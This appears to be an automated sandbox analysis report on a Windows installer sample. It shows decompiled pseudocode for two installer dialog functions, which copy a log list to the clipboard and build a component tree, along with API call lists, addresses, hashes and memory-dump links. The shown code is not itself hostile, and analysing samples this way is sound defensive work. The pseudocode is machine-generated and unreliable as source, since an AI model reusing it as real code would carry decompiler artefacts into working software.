							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405D46(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x79eda0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x7a1f6c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a27a8, 8);
							__eflags =  *0x7a282c - _t149;
							if( *0x7a282c == _t149) {
								E00405010( *((intOrPtr*)( *0x79e570 + 0x34)), _t149);
							}
							E00403FB9(1);
							goto L25;
						}
						 *0x79e168 = 2;
						E00403FB9(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404047(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a1f70, _t149);
						ShowWindow(_t154, 8);
						E00404015(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a27b0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a1f70 = GetDlgItem(_a4, 0x403);
				 *0x7a1f68 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a1f84 = _t127;
				_v8 = _t127;
				E00404015( *0x7a1f70);
				 *0x7a1f74 = E004048B2(4);
				 *0x7a1f8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FE0(_a4);
				if(( *0x7a27b8 & 0x00000003) != 0) {
					ShowWindow( *0x7a1f70, _t149);
					if(( *0x7a27b8 & 0x00000002) != 0) {
						 *0x7a1f70 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404015( *0x7a1f68);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x7a27b8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                                  0x00405157
                                                                                                  0x0040515d
                                                                                                  0x00405166
                                                                                                  0x00405169
                                                                                                  0x004052fa
                                                                                                  0x00405301
                                                                                                  0x00405325
                                                                                                  0x00405325
                                                                                                  0x0040532b
                                                                                                  0x00405338
                                                                                                  0x00405356
                                                                                                  0x00405356
                                                                                                  0x0040535d
                                                                                                  0x004053b4
                                                                                                  0x004053b4
                                                                                                  0x004053b8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004053ba
                                                                                                  0x004053bd
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004053c7
                                                                                                  0x004053cd
                                                                                                  0x004053cf
                                                                                                  0x004053d2
                                                                                                  0x004054cb
                                                                                                  0x00000000
                                                                                                  0x004054cb
                                                                                                  0x004053e1
                                                                                                  0x004053ed
                                                                                                  0x004053f3
                                                                                                  0x004053f6
                                                                                                  0x004053f9
                                                                                                  0x0040540e
                                                                                                  0x00405411
                                                                                                  0x00405411
                                                                                                  0x00405414
                                                                                                  0x004053fb
                                                                                                  0x00405400
                                                                                                  0x00405406
                                                                                                  0x00405409
                                                                                                  0x00405409
                                                                                                  0x00405424
                                                                                                  0x0040542c
                                                                                                  0x0040542d
                                                                                                  0x0040542f
                                                                                                  0x00405438
                                                                                                  0x0040543b
                                                                                                  0x00405442
                                                                                                  0x00405449
                                                                                                  0x00405451
                                                                                                  0x00405451
                                                                                                  0x0040545f
                                                                                                  0x00405465
                                                                                                  0x00405468
                                                                                                  0x00405468
                                                                                                  0x0040546f
                                                                                                  0x00405475
                                                                                                  0x0040547e
                                                                                                  0x00405485
                                                                                                  0x0040548e
                                                                                                  0x00405490
                                                                                                  0x00405493
                                                                                                  0x004054a2
                                                                                                  0x004054a4
                                                                                                  0x004054aa
                                                                                                  0x004054ab
                                                                                                  0x004054ac
                                                                                                  0x004054ac
                                                                                                  0x004054b4
                                                                                                  0x004054bf
                                                                                                  0x004054c5
                                                                                                  0x004054c5
                                                                                                  0x00000000
                                                                                                  0x0040542f
                                                                                                  0x0040535f
                                                                                                  0x00405365
                                                                                                  0x00405395
                                                                                                  0x00405397
                                                                                                  0x0040539d
                                                                                                  0x004053a8
                                                                                                  0x004053a8
                                                                                                  0x004053af
                                                                                                  0x00000000
                                                                                                  0x004053af
                                                                                                  0x00405369
                                                                                                  0x00405373
                                                                                                  0x00000000
                                                                                                  0x0040533a
                                                                                                  0x0040533a
                                                                                                  0x00405340
                                                                                                  0x00405378
                                                                                                  0x00000000
                                                                                                  0x00405381
                                                                                                  0x00405349
                                                                                                  0x0040534e
                                                                                                  0x00405351
                                                                                                  0x00000000
                                                                                                  0x00405351
                                                                                                  0x00405338
                                                                                                  0x0040516f
                                                                                                  0x00405173
                                                                                                  0x0040517c
                                                                                                  0x00405183
                                                                                                  0x00405186
                                                                                                  0x00405189
                                                                                                  0x0040518c
                                                                                                  0x0040518d
                                                                                                  0x0040518e
                                                                                                  0x004051a7
                                                                                                  0x004051aa
                                                                                                  0x004051b4
                                                                                                  0x004051c3
                                                                                                  0x004051cb
                                                                                                  0x004051d3
                                                                                                  0x004051d8
                                                                                                  0x004051db
                                                                                                  0x004051e7
                                                                                                  0x004051f0
                                                                                                  0x004051f9
                                                                                                  0x0040521c
                                                                                                  0x00405222
                                                                                                  0x00405233
                                                                                                  0x00405238
                                                                                                  0x00405246
                                                                                                  0x00405254
                                                                                                  0x00405254
                                                                                                  0x00405259
                                                                                                  0x00405267
                                                                                                  0x00405267
                                                                                                  0x0040526c
                                                                                                  0x0040526f
                                                                                                  0x00405274
                                                                                                  0x00405280
                                                                                                  0x00405289
                                                                                                  0x00405296
                                                                                                  0x004052a5
                                                                                                  0x00405298
                                                                                                  0x0040529d
                                                                                                  0x0040529d
                                                                                                  0x004052b1
                                                                                                  0x004052b1
                                                                                                  0x004052c5
                                                                                                  0x004052ce
                                                                                                  0x004052d7
                                                                                                  0x004052e7
                                                                                                  0x004052f3
                                                                                                  0x004052f3
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 004051AD
                                                                                                  • GetDlgItem.USER32 ref: 004051BC
                                                                                                  • GetClientRect.USER32 ref: 004051F9
                                                                                                  • GetSystemMetrics.USER32 ref: 00405201
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405222
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405233
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405246
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405254
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405267
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405289
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040529D
                                                                                                  • GetDlgItem.USER32 ref: 004052BE
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052CE
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052E7
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052F3
                                                                                                  • GetDlgItem.USER32 ref: 004051CB
                                                                                                    • Part of subcall function 00404015: SendMessageA.USER32(00000028,?,00000001,00403E46), ref: 00404023
                                                                                                  • GetDlgItem.USER32 ref: 00405310
                                                                                                  • CreateThread.KERNEL32 ref: 0040531E
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405325
                                                                                                  • ShowWindow.USER32(00000000), ref: 00405349
                                                                                                  • ShowWindow.USER32(00000000,00000008), ref: 0040534E
                                                                                                  • ShowWindow.USER32(00000008), ref: 00405395
                                                                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004053C7
                                                                                                  • CreatePopupMenu.USER32 ref: 004053D8
                                                                                                  • AppendMenuA.USER32 ref: 004053ED
                                                                                                  • GetWindowRect.USER32 ref: 00405400
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405424
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545F
                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040546F
                                                                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405475
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040547E
                                                                                                  • GlobalLock.KERNEL32 ref: 00405488
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040549C
                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004054B4
                                                                                                  • SetClipboardData.USER32 ref: 004054BF
                                                                                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004054C5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: {
                                                                                                  • API String ID: 590372296-366298937
                                                                                                  • Opcode ID: 309033a1c687b2536ac40d3c93993909fdfe10b16a59350bcc5de762b65fd5f7
                                                                                                  • Instruction ID: e51c2fae687d9cc7d74fcbf9b141dffd1b03231730d505384ae97275b1f3778e
                                                                                                  • Opcode Fuzzy Hash: 309033a1c687b2536ac40d3c93993909fdfe10b16a59350bcc5de762b65fd5f7
                                                                                                  • Instruction Fuzzy Hash: 50A14A70800248FFEB119F60DC89AAE7F79FB48355F00812AFA05BA1E1C7795A51DF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040495F, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 97%
                                                                                                  			E0040495F(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a27c8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a27b0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a27b9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048DF(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a27b8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79ed7c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79ed94;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79ed7c = _t315;
								 *0x79ed94 = _t315;
								 *0x7a2800 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a27b9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79ed94;
									_t196 =  *0x7a27c8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a27cc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										_t198 =  *0x7a1f7c; // 0x891203
										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
											E0040489A(0x3ff, 0xfffffffb, E004048B2(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a27cc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79ed94);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2800 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79ed94 = GlobalAlloc(0x40,  *0x7a27cc << 2);
					_t250 = LoadBitmapA( *0x7a27a0, 0x6e);
					 *0x79ed88 =  *0x79ed88 | 0xffffffff;
					_v24 = _t250;
					 *0x79ed90 = SetWindowLongA(_v8, 0xfffffffc, E00404F60);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79ed7c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79ed7c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D46(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FE0(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FE0(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a27cc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79ed94 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79ed94 + _t318 * 4) = _t274;
									_t288 =  *( *0x79ed94 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a27cc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00404015(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404015(_v12);
								L89:
								return E00404047(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                                  0x0040497d
                                                                                                  0x00404983
                                                                                                  0x00404985
                                                                                                  0x0040498b
                                                                                                  0x00404991
                                                                                                  0x0040499e
                                                                                                  0x004049a7
                                                                                                  0x004049aa
                                                                                                  0x004049ad
                                                                                                  0x00404bd5
                                                                                                  0x00404bdc
                                                                                                  0x00404bf0
                                                                                                  0x00404bde
                                                                                                  0x00404be0
                                                                                                  0x00404be3
                                                                                                  0x00404be4
                                                                                                  0x00404beb
                                                                                                  0x00404beb
                                                                                                  0x00404bfc
                                                                                                  0x00404c0a
                                                                                                  0x00404c0d
                                                                                                  0x00404c23
                                                                                                  0x00404c9b
                                                                                                  0x00404c9e
                                                                                                  0x00404ca0
                                                                                                  0x00404caa
                                                                                                  0x00404cb8
                                                                                                  0x00404cb8
                                                                                                  0x00404cba
                                                                                                  0x00404cc4
                                                                                                  0x00404cca
                                                                                                  0x00404ceb
                                                                                                  0x00404ccc
                                                                                                  0x00404cd9
                                                                                                  0x00404cd9
                                                                                                  0x00404cca
                                                                                                  0x00404cc4
                                                                                                  0x00000000
                                                                                                  0x00404c9e
                                                                                                  0x00404c28
                                                                                                  0x00404c33
                                                                                                  0x00404c38
                                                                                                  0x00404c3f
                                                                                                  0x00404c46
                                                                                                  0x00404c50
                                                                                                  0x00404c50
                                                                                                  0x00404c54
                                                                                                  0x00404c59
                                                                                                  0x00404c5e
                                                                                                  0x00404c74
                                                                                                  0x00404c60
                                                                                                  0x00404c60
                                                                                                  0x00404c68
                                                                                                  0x00404c6f
                                                                                                  0x00404c6a
                                                                                                  0x00404c6a
                                                                                                  0x00404c6a
                                                                                                  0x00404c68
                                                                                                  0x00404c78
                                                                                                  0x00404c7a
                                                                                                  0x00404c88
                                                                                                  0x00404c89
                                                                                                  0x00404c95
                                                                                                  0x00404c98
                                                                                                  0x00404c98
                                                                                                  0x00404c59
                                                                                                  0x00000000
                                                                                                  0x00404c46
                                                                                                  0x00404c2a
                                                                                                  0x00404c31
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404cee
                                                                                                  0x00404cee
                                                                                                  0x00404cf5
                                                                                                  0x00404d69
                                                                                                  0x00404d70
                                                                                                  0x00404d7c
                                                                                                  0x00404d7c
                                                                                                  0x00404d85
                                                                                                  0x00404d87
                                                                                                  0x00404d8e
                                                                                                  0x00404d91
                                                                                                  0x00404d91
                                                                                                  0x00404d97
                                                                                                  0x00404d9e
                                                                                                  0x00404da1
                                                                                                  0x00404da1
                                                                                                  0x00404da7
                                                                                                  0x00404dad
                                                                                                  0x00404db3
                                                                                                  0x00404db3
                                                                                                  0x00404dc0
                                                                                                  0x00404f0d
                                                                                                  0x00404f14
                                                                                                  0x00404f31
                                                                                                  0x00404f37
                                                                                                  0x00404f49
                                                                                                  0x00404f49
                                                                                                  0x00000000
                                                                                                  0x00404dc6
                                                                                                  0x00404dc8
                                                                                                  0x00404dd0
                                                                                                  0x00404dd4
                                                                                                  0x00404dd4
                                                                                                  0x00404ddc
                                                                                                  0x00404e1d
                                                                                                  0x00404e1f
                                                                                                  0x00404e2f
                                                                                                  0x00404e32
                                                                                                  0x00404e37
                                                                                                  0x00404e3e
                                                                                                  0x00404e41
                                                                                                  0x00404ee3
                                                                                                  0x00404ee9
                                                                                                  0x00404eef
                                                                                                  0x00404ef7
                                                                                                  0x00404f08
                                                                                                  0x00404f08
                                                                                                  0x00000000
                                                                                                  0x00404ef7
                                                                                                  0x00404e47
                                                                                                  0x00404e4a
                                                                                                  0x00404e50
                                                                                                  0x00404e55
                                                                                                  0x00404e57
                                                                                                  0x00404e59
                                                                                                  0x00404e5f
                                                                                                  0x00404e66
                                                                                                  0x00404e6b
                                                                                                  0x00404e72
                                                                                                  0x00404e75
                                                                                                  0x00404e75
                                                                                                  0x00404e7c
                                                                                                  0x00404e88
                                                                                                  0x00404e8c
                                                                                                  0x00404e8e
                                                                                                  0x00404e8e
                                                                                                  0x00404e7e
                                                                                                  0x00404e80
                                                                                                  0x00404e80
                                                                                                  0x00404eae
                                                                                                  0x00404eba
                                                                                                  0x00404ec9
                                                                                                  0x00404ec9
                                                                                                  0x00404ecb
                                                                                                  0x00404ece
                                                                                                  0x00404ed7
                                                                                                  0x00000000
                                                                                                  0x00404dde
                                                                                                  0x00404de9
                                                                                                  0x00404dec
                                                                                                  0x00404df1
                                                                                                  0x00404df3
                                                                                                  0x00404df7
                                                                                                  0x00404e07
                                                                                                  0x00404e11
                                                                                                  0x00404e13
                                                                                                  0x00404e16
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404df9
                                                                                                  0x00404df9
                                                                                                  0x00404dff
                                                                                                  0x00404e01
                                                                                                  0x00404e01
                                                                                                  0x00404e02
                                                                                                  0x00404e03
                                                                                                  0x00000000
                                                                                                  0x00404df9
                                                                                                  0x00404ddc
                                                                                                  0x00404dc0
                                                                                                  0x00404cfd
                                                                                                  0x00000000
                                                                                                  0x00404d13
                                                                                                  0x00404d1d
                                                                                                  0x00404d22
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404d34
                                                                                                  0x00404d39
                                                                                                  0x00404d45
                                                                                                  0x00404d45
                                                                                                  0x00404d47
                                                                                                  0x00404d56
                                                                                                  0x00404d58
                                                                                                  0x00404d5f
                                                                                                  0x00404d62
                                                                                                  0x00000000
                                                                                                  0x00404d62
                                                                                                  0x00404cfd
                                                                                                  0x004049b3
                                                                                                  0x004049b8
                                                                                                  0x004049c2
                                                                                                  0x004049c3
                                                                                                  0x004049cc
                                                                                                  0x004049d7
                                                                                                  0x004049e2
                                                                                                  0x004049e8
                                                                                                  0x004049f6
                                                                                                  0x00404a0b
                                                                                                  0x00404a10
                                                                                                  0x00404a1b
                                                                                                  0x00404a24
                                                                                                  0x00404a39
                                                                                                  0x00404a4a
                                                                                                  0x00404a57
                                                                                                  0x00404a57
                                                                                                  0x00404a5c
                                                                                                  0x00404a62
                                                                                                  0x00404a64
                                                                                                  0x00404a67
                                                                                                  0x00404a6c
                                                                                                  0x00404a71
                                                                                                  0x00404a73
                                                                                                  0x00404a73
                                                                                                  0x00404a93
                                                                                                  0x00404a93
                                                                                                  0x00404a95
                                                                                                  0x00404a96
                                                                                                  0x00404a9b
                                                                                                  0x00404a9e
                                                                                                  0x00404aa1
                                                                                                  0x00404aa5
                                                                                                  0x00404aaa
                                                                                                  0x00404aaf
                                                                                                  0x00404ab3
                                                                                                  0x00404ab8
                                                                                                  0x00404abd
                                                                                                  0x00404abf
                                                                                                  0x00404ac7
                                                                                                  0x00404b91
                                                                                                  0x00404ba4
                                                                                                  0x00000000
                                                                                                  0x00404acd
                                                                                                  0x00404ad0
